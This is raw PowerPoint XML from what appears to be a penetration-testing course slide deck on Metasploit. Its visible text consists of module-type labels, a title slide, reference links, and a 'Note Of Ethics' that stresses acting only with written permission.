    <dgm:cxn modelId="{C738FB1C-4F7B-4A79-8540-14BBFE33818D}" type="presParOf" srcId="{324BF386-BD40-4573-8304-2143A362BDE4}" destId="{F7B09D3F-E917-4C42-BD5D-FCB0F785F4F6}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{F761DC21-4F86-47C0-9A97-FF97E364ADF8}" type="presParOf" srcId="{324BF386-BD40-4573-8304-2143A362BDE4}" destId="{38A0FCA7-8BE1-41EF-B620-54E99AD5469B}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{8C89D2E8-FC20-4800-9E0E-815B1CA30E1B}" type="presParOf" srcId="{38A0FCA7-8BE1-41EF-B620-54E99AD5469B}" destId="{D7C93A68-5DD0-4203-8711-D6FC8B125DAC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{C9220490-0C60-46E5-89AF-02CAA7383EAD}" type="presParOf" srcId="{324BF386-BD40-4573-8304-2143A362BDE4}" destId="{53120260-8853-4E86-8AC9-8510FD44780A}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{5149B375-24A6-4B44-83FD-6ACFD900BB9C}" type="presParOf" srcId="{324BF386-BD40-4573-8304-2143A362BDE4}" destId="{D7CF3BC9-D05F-4D81-8E15-BBF97AF5D061}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{D267EAA8-2D8A-488E-8702-802C79F42B27}" type="presParOf" srcId="{D7CF3BC9-D05F-4D81-8E15-BBF97AF5D061}" destId="{414B2161-725B-47BF-B965-6ADDF0971D65}"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335902"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3402" y="4078025"/>
          <a:ext cx="1807958" cy="941082"/>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Exploits</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3402" y="4078025"/>
        <a:ext cx="1690323" cy="941082"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{810D7AA7-A541-4507-BE7F-36CCF210089F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="148039" y="1341559"/>
          <a:ext cx="1468062" cy="2649684"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
    </dsp:sp>
    <dsp:sp modelId="{E41E7729-FD3F-426D-804C-45BD60BD762D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="381657"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720963" y="4078025"/>
          <a:ext cx="1807958" cy="941082"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">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Auxiliary</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1956234" y="4078025"/>
        <a:ext cx="1337417" cy="941082"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5E07F9E4-149C-4A89-848F-4ABDD305F0C5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1865600" y="1341559"/>
          <a:ext cx="1468062" cy="264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endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1865600" y="1341559"/>
        <a:ext cx="1468062" cy="2649684"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{473F2067-7126-4D56-A328-5A8CFD3D8D52}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="2099218"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438524" y="4078025"/>
          <a:ext cx="1807958" cy="941082"/>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Post</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3673795" y="4078025"/>
        <a:ext cx="1337417" cy="941082"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FD7B29F2-0D66-4B4B-BC8A-82DA23575305}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3583160" y="1341559"/>
          <a:ext cx="1468062" cy="264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endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3583160" y="1341559"/>
        <a:ext cx="1468062" cy="2649684"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7BF6E820-C6E3-4E2C-BB23-ADF9AD641C6B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3839378"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5178684" y="4078025"/>
          <a:ext cx="1807958" cy="941082"/>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Payloads</a:t>
          </a:r>
          <a:endParaRPr lang="ru-RU" sz="1800" b="1" kern="1200" dirty="0">
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:schemeClr val="tx1">
                  <a:alpha val="50000"/>
                </a:schemeClr>
              </a:outerShdw>
            </a:effectLst>
            <a:latin typeface="+mj-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5413955" y="4078025"/>
        <a:ext cx="1337417" cy="941082"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1D84544C-5924-422B-9546-A86AE4927E4C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5323320" y="1341559"/>
          <a:ext cx="1468062" cy="264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sp:txBody>
      <dsp:txXfrm>
        <a:off x="5323320" y="1341559"/>
        <a:ext cx="1468062" cy="2649684"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0EE416CF-D8AE-41BD-BF35-9148040E1274}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="5534339"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6873645" y="4078025"/>
          <a:ext cx="1807958" cy="941082"/>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Encoders</a:t>
          </a:r>
          <a:endParaRPr lang="ru-RU" sz="1800" b="1" kern="1200" dirty="0">
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:schemeClr val="tx1">
                  <a:alpha val="50000"/>
                </a:schemeClr>
              </a:outerShdw>
            </a:effectLst>
            <a:latin typeface="+mj-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7108916" y="4078025"/>
        <a:ext cx="1337417" cy="941082"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7F54B493-FCA8-4A1F-A2B1-FCB26CA9C396}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7018282" y="1341559"/>
          <a:ext cx="1468062" cy="2154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sp:txBody>
      <dsp:txXfrm>
        <a:off x="7018282" y="1341559"/>
        <a:ext cx="1468062" cy="2154700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C91FF04E-3EE2-4CF2-B76D-85E04F7A3B29}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="7251900"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600BC4-FC3D-4651-897E-1F5668327DF6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8591205" y="4078025"/>
          <a:ext cx="1807958" cy="941082"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst>
            <a:gd name="adj" fmla="val 2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648000" rIns="288000" bIns="152400" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="533400">
            <a:lnSpc>
              <a:spcPts val="1500"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Nops</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="8826476" y="4078025"/>
        <a:ext cx="1337417" cy="941082"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{12E40988-FBA8-44BD-A1AA-6B0901462602}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8735842" y="1341559"/>
          <a:ext cx="1468062" cy="2154700"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
    </dsp:sp>
    <dsp:sp modelId="{A0F8C385-32EE-47D9-AF69-CCE9AA18FC57}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="8969460" y="2594082"/>
          <a:ext cx="2823248" cy="144636"/>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9B3449-B318-4AAC-9393-033B4E62F19B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="10308766" y="4078025"/>
          <a:ext cx="1807958" cy="941082"/>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648000" rIns="288000" bIns="228600" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="533400">
            <a:lnSpc>
              <a:spcPts val="1500"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Evasion</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="10544037" y="4078025"/>
        <a:ext cx="1337417" cy="941082"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{04B08F9A-0351-430E-ABAC-E31DBA861B76}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="10453403" y="1341559"/>
          <a:ext cx="1468062" cy="215470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D46DC-7F1A-4B06-9950-F3FB6B9DADC7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2801721" y="3284944"/>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65562-C697-463B-9032-081255759F2E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2623718" y="3570203"/>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029F9-92C6-4CFE-B9AC-3294735DFDDF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2411577" y="3817176"/>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290798-58EF-412B-8B72-BD65A97F3AF0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2665171" y="414017"/>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71788-5293-431A-9534-C7627A5893A2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2936646" y="252245"/>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01D5A-3E1D-43C5-B723-6FE940A2FFF8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3207308" y="90472"/>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DE8A9A-E4B3-4A40-99E1-D009B6D019FF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3477971" y="252245"/>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507DE6-46CE-4183-A624-2464E4F0B38F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3749446" y="414017"/>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5DF38-FC13-4BA9-B43D-712E919B0B04}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3207308" y="431812"/>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DE74C-EB7A-4EE3-AAF1-56900FFA3243}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3207308" y="773153"/>
          <a:ext cx="203200" cy="20320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B09D3F-E917-4C42-BD5D-FCB0F785F4F6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1554073" y="4559396"/>
          <a:ext cx="4382617" cy="11755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7654" tIns="186690" rIns="186690" bIns="186690" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="r" defTabSz="2178050" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="4900" b="1" kern="1200" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:rPr>
            <a:t>Passive</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="4900" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:endParaRPr lang="ar-EG" sz="4900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1611459" y="4616782"/>
        <a:ext cx="4267845" cy="1060776"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D7C93A68-5DD0-4203-8711-D6FC8B125DAC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="715771" y="3793551"/>
          <a:ext cx="2032000" cy="203186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120260-8853-4E86-8AC9-8510FD44780A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3406444" y="2260066"/>
          <a:ext cx="4382617" cy="11755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7654" tIns="186690" rIns="186690" bIns="186690" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="r" defTabSz="2178050" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="4900" b="1" kern="1200" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:rPr>
            <a:t>Active</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="4900" kern="1200" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:endParaRPr lang="ar-EG" sz="4900" kern="1200" dirty="0">
            <a:effectLst>
              <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                <a:srgbClr val="000000">
                  <a:alpha val="43137"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3463830" y="2317452"/>
        <a:ext cx="4267845" cy="1060776"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{414B2161-725B-47BF-B965-6ADDF0971D65}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2191308" y="1108245"/>
          <a:ext cx="2032000" cy="2031865"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="7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02/21/2023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You can safely remove this slide. This slide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> design was provided by SlideModel.com – You can download more templates, shapes and elements for PowerPoint from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://slidemodel.com/</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210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104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="200034355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02/21/2023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296795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02/21/2023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9269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 id="2147483667" r:id="rId10"/>
    <p:sldLayoutId id="2147483668" r:id="rId11"/>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hyperlink" Target="http://slidemodel.com/account/plans/?utm_source=free&amp;utm_medium=button&amp;utm_campaign=freetemplate"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8.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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apid7/metasploit-framework"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s://en.wikipedia.org/wiki/NOP_(code)"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metasploit.help.rapid7.com/docs/the-sessions-page" TargetMode="Externa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bin"/><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hyperlink" Target="https://attack.mitre.org/software/S0154"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METASPLOIT </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MSFCONSOLE </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2" y="5371691"/>
            <a:ext cx="12192000" cy="1474968"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4000" b="1" dirty="0">
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Eng. Mina Magdy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="" altLang="en-US" sz="2800" cap="none" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sscp,oscp,crtp,pts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>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A3009B9E-9E2F-3673-CF1E-563DD4A0D041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="158833" y="595409"/>
            <a:ext cx="11120771" cy="4445668"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Our Goals This Course Improve your Skills as a  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>penetration tester. As a penetration tester, you will be bypassing security measures;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>that’s simply part of the job. When you do, keep the following in mind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Don’t be malicious.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Don’t be stupid.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Don’t attack targets without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="sng" dirty="0"/>
              <a:t>written permission .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Consider the consequences of your actions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>If you do things illegally, you can be caught and put in jail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFEAF0CD-1B1D-9613-CAB1-1784E054121B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48126" y="72189"/>
            <a:ext cx="2186817" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note Of Ethics</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" i="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857875272"/>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0811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0957-8F62-41FD-BEF7-E5A40457B7C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
